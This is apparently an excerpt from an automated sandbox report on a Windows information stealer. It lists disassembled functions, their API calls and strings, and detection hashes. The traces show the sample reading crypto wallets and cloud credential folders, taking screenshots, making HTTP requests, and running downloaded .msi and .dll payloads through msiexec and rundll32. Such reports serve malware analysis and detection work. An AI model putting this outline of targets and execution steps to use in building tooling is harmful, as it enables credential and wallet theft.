                                        • lstrlen.KERNEL32(00000000), ref: 00CA5E82
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00CA5E93
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CA5E9A
                                        • lstrlen.KERNEL32(00000000), ref: 00CA5EAF
                                        • lstrlen.KERNEL32(00000000), ref: 00CA5ED8
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00CA5EF1
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00CA5F1B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CA5F2F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00CA5F4C
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA5FB0
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA5FBD
                                        • HttpOpenRequestA.WININET(00000000,009DF250,?,009DE910,00000000,00000000,00400100,00000000), ref: 00CA5BF8
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA5FC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: f272be415cdd41db303acd3371c283272ba4f0b0d3e956509f76ea62f20d73bc
                                        • Instruction ID: e77646ed72e0b89945579196809041491bc15f6ce60d7c02d5f4c9b4820d1365
                                        • Opcode Fuzzy Hash: f272be415cdd41db303acd3371c283272ba4f0b0d3e956509f76ea62f20d73bc
                                        • Instruction Fuzzy Hash: 4D121B71820128BADB15EBA0DC95FEEB37CBF14700F5041A9F14676491EF702A4AEF65
                                        Function 00CACEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(00CC0E1A,009DE528,00CC05AE,?,?,00CA13F9,?,0000001A,00CC0E1A,00000000,?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CB8B86
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CACF83
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00CAD0C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CAD0CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD208
                                        • lstrcat.KERNEL32(?,00CC1478), ref: 00CAD217
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD22A
                                        • lstrcat.KERNEL32(?,00CC147C), ref: 00CAD239
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD24C
                                        • lstrcat.KERNEL32(?,00CC1480), ref: 00CAD25B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD26E
                                        • lstrcat.KERNEL32(?,00CC1484), ref: 00CAD27D
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD290
                                        • lstrcat.KERNEL32(?,00CC1488), ref: 00CAD29F
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD2B2
                                        • lstrcat.KERNEL32(?,00CC148C), ref: 00CAD2C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CAD2D4
                                        • lstrcat.KERNEL32(?,00CC1490), ref: 00CAD2E3
                                          • Part of subcall function 00CBA820: lstrlen.KERNEL32(00CA4F05,?,?,00CA4F05,00CC0DDE), ref: 00CBA82B
                                          • Part of subcall function 00CBA820: lstrcpy.KERNEL32(00CC0DDE,00000000), ref: 00CBA885
                                        • lstrlen.KERNEL32(?), ref: 00CAD32A
                                        • lstrlen.KERNEL32(?), ref: 00CAD339
                                          • Part of subcall function 00CBAA70: StrCmpCA.SHLWAPI(009D8C28,00CAA7A7,?,00CAA7A7,009D8C28), ref: 00CBAA8F
                                        • DeleteFileA.KERNEL32(00000000), ref: 00CAD3B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: 54bdd61bbfcf834269a39260d10819830fbdf09fef1a6377185e36c8bdedf469
                                        • Instruction ID: 296e1dfa1944c6cefe3f4150c7d0de3f5fc04623b65bcb84237b1f832c9cc527
                                        • Opcode Fuzzy Hash: 54bdd61bbfcf834269a39260d10819830fbdf09fef1a6377185e36c8bdedf469
                                        • Instruction Fuzzy Hash: B5E11A71910109AFCB18EBA1DD96EEE7378AF14301F144168F547B70A1DE35BA0AEB62
                                        Function 00CAC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,009DD3F8,00000000,?,00CC144C,00000000,?,?), ref: 00CACA6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00CACA89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00CACA95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CACAA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CACAD9
                                        • StrStrA.SHLWAPI(?,009DD4E8,00CC0B52), ref: 00CACAF7
                                        • StrStrA.SHLWAPI(00000000,009DD410), ref: 00CACB1E
                                        • StrStrA.SHLWAPI(?,009DD920,00000000,?,00CC1458,00000000,?,00000000,00000000,?,009D8B58,00000000,?,00CC1454,00000000,?), ref: 00CACCA2
                                        • StrStrA.SHLWAPI(00000000,009DDA60), ref: 00CACCB9
                                          • Part of subcall function 00CAC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00CAC871
                                          • Part of subcall function 00CAC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00CAC87C
                                        • StrStrA.SHLWAPI(?,009DDA60,00000000,?,00CC145C,00000000,?,00000000,009D8AC8), ref: 00CACD5A
                                        • StrStrA.SHLWAPI(00000000,009D89B8), ref: 00CACD71
                                          • Part of subcall function 00CAC820: lstrcat.KERNEL32(?,00CC0B46), ref: 00CAC943
                                          • Part of subcall function 00CAC820: lstrcat.KERNEL32(?,00CC0B47), ref: 00CAC957
                                          • Part of subcall function 00CAC820: lstrcat.KERNEL32(?,00CC0B4E), ref: 00CAC978
                                        • lstrlen.KERNEL32(00000000), ref: 00CACE44
                                        • CloseHandle.KERNEL32(00000000), ref: 00CACE9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: 918248356c2bcecb0ce60dc29d0d32bc11512fb2b3ff44f03a1dc581ca6abe9d
                                        • Instruction ID: 053ec0ca2588ae6b50920436787bca18f6d83705f02be8afca9d8d8ac63c0506
                                        • Opcode Fuzzy Hash: 918248356c2bcecb0ce60dc29d0d32bc11512fb2b3ff44f03a1dc581ca6abe9d
                                        • Instruction Fuzzy Hash: 06E1F771C10108BFDB14EBA1DCA6FEEB778AF14300F444169F146B6592EF316A4ADB62
                                        Function 00CB8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • RegOpenKeyExA.ADVAPI32(00000000,009DB908,00000000,00020019,00000000,00CC05B6), ref: 00CB83A4
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CB8426
                                        • wsprintfA.USER32 ref: 00CB8459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00CB847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB8499
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 7b20410112ddadd82af7c0e274754d61b46d00f9d2f139e4a7a445b1f3efb173
                                        • Instruction ID: 7161e337edc9c6829eb73a10c2a83b911e7f8262a395814d870fc8b8aaf61bb3
                                        • Opcode Fuzzy Hash: 7b20410112ddadd82af7c0e274754d61b46d00f9d2f139e4a7a445b1f3efb173
                                        • Instruction Fuzzy Hash: 8681FA7191011CAFEB28DB54CC95FEAB7BCBB08700F008299F149A6180DF716B89DFA5
                                        Function 00CB4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CB8E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB4DB0
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 00CB4DCD
                                          • Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB492C
                                          • Part of subcall function 00CB4910: FindFirstFileA.KERNEL32(?,?), ref: 00CB4943
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB4E3C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 00CB4E59
                                          • Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FDC), ref: 00CB4971
                                          • Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FE0), ref: 00CB4987
                                          • Part of subcall function 00CB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00CB4B7D
                                          • Part of subcall function 00CB4910: FindClose.KERNEL32(000000FF), ref: 00CB4B92
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB4EC8
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00CB4EE5
                                          • Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB49B0
                                          • Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC08D2), ref: 00CB49C5
                                          • Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB49E2
                                          • Part of subcall function 00CB4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00CB4A1E
                                          • Part of subcall function 00CB4910: lstrcat.KERNEL32(?,009DF2C0), ref: 00CB4A4A
                                          • Part of subcall function 00CB4910: lstrcat.KERNEL32(?,00CC0FF8), ref: 00CB4A5C
                                          • Part of subcall function 00CB4910: lstrcat.KERNEL32(?,?), ref: 00CB4A70
                                          • Part of subcall function 00CB4910: lstrcat.KERNEL32(?,00CC0FFC), ref: 00CB4A82
                                          • Part of subcall function 00CB4910: lstrcat.KERNEL32(?,?), ref: 00CB4A96
                                          • Part of subcall function 00CB4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00CB4AAC
                                          • Part of subcall function 00CB4910: DeleteFileA.KERNEL32(?), ref: 00CB4B31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: 8edc1c2f332fcf90d3c629639c5f06dda499f3a10ae809e92b3d1c33202bee3c
                                        • Instruction ID: 5d7db87379fc9b4f4548e2564168387c8caa039af8f8bfb3906610c69cd4e0dc
                                        • Opcode Fuzzy Hash: 8edc1c2f332fcf90d3c629639c5f06dda499f3a10ae809e92b3d1c33202bee3c
                                        • Instruction Fuzzy Hash: 0641987994020867DB54F770DC8BFED333CAB65700F044468B689A60C2EDB56BC9DB92
                                        Function 00CB9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CB906C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: image/jpeg
                                        • API String ID: 2244384528-3785015651
                                        • Opcode ID: 06769e1f33be518103d59bc877a93c8612cbb820dede7db3c1c96ef09ca3fe3e
                                        • Instruction ID: b336373f882d66bccb14dc6fa2ffee094974e7020dd4b8dbdddf48bc555879e0
                                        • Opcode Fuzzy Hash: 06769e1f33be518103d59bc877a93c8612cbb820dede7db3c1c96ef09ca3fe3e
                                        • Instruction Fuzzy Hash: 7171D9B5D10208AFDB04EFE5DC89FEEB7B9AB48700F148518F615AB290DB34A905DB61
                                        Function 00CB2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00CB31C5
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00CB335D
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00CB34EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: f73b6f28739b9dc39567a6047772049e82c8dd1e140331101ad6ed31425939ab
                                        • Instruction ID: d5a687d73df7e5391d77b15af01e4ee4fdd267a48767341aad2e55cfaaadbcec
                                        • Opcode Fuzzy Hash: f73b6f28739b9dc39567a6047772049e82c8dd1e140331101ad6ed31425939ab
                                        • Instruction Fuzzy Hash: FB120D71C10108AADB19EBA0DC92FEEB73CAF14300F544169F54676591EF352B4AEFA2
                                        Function 00CB52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA6280: InternetOpenA.WININET(00CC0DFE,00000001,00000000,00000000,00000000), ref: 00CA62E1
                                          • Part of subcall function 00CA6280: StrCmpCA.SHLWAPI(?,009DF1A0), ref: 00CA6303
                                          • Part of subcall function 00CA6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA6335
                                          • Part of subcall function 00CA6280: HttpOpenRequestA.WININET(00000000,GET,?,009DE910,00000000,00000000,00400100,00000000), ref: 00CA6385
                                          • Part of subcall function 00CA6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CA63BF
                                          • Part of subcall function 00CA6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CA63D1
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB5318
